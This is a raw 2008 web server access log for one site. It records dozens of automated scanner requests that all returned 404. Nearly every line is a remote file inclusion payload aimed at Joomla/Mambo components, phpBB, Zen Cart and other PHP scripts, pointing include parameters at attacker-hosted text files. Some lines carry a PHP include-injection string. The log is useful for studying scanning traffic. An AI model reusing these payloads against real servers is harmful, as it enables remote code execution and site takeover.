85.234.133.173 - - [26/Jul/2008:05:31:59 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:32:00 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:32:00 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:32:01 -0700] "GET /logs/access_080716.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:32:01 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:32:01 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:32:42 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:32:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:32:46 -0700] "GET /logs/access_080717.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:49 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:50 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:51 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:32:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:57 -0700] "GET /logs/@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:57 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:57 -0700] "GET /@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:58 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:32:58 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:06 -0700] "GET /logs/access.log/@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:07 -0700] "GET /@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:07 -0700] "GET /logs/@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:33:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:33:10 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:33:10 -0700] "GET /logs/access_080716.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:33:12 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:33:12 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:33:12 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:33:16 -0700] "GET /logs/access_080717.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:33:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:33:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:33 -0700] "GET /logs/access_080717.log/@rfihttp://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:33:35 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:33:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:33:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:36 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:36 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:33:36 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:34:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:34:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:34:09 -0700] "GET /logs/access_080717.log//skin/zero_vote/ask_password.php?dir=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:34:20 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:34:20 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:34:20 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:34:46 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:34:46 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.252.183 - - [26/Jul/2008:05:34:56 -0700] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
205.234.252.183 - - [26/Jul/2008:05:34:57 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:35:09 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:35:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:35:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:35:15 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:35:16 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:35:16 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
65.98.67.106 - - [26/Jul/2008:05:35:20 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:35:56 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:35:56 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:11 -0700] "GET /logs/access_080625.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:13 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:13 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:36:15 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:36:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:36:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:36:16 -0700] "GET /logs/access_080717.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:36:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:36:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:36:21 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:36:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:36:22 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:27 -0700] "GET /logs/access_080717.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:36:30 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:36:37 -0700] "GET /logs/access_080717.log//skin/zero_vote/ask_password.php?dir=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:36:51 -0700] "GET /logs/access_080717.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:36:55 -0700] "GET /logs/access_080717.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:36:55 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:36:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:37:04 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:37:04 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:37:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:37:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:37:10 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:37:10 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:37:11 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
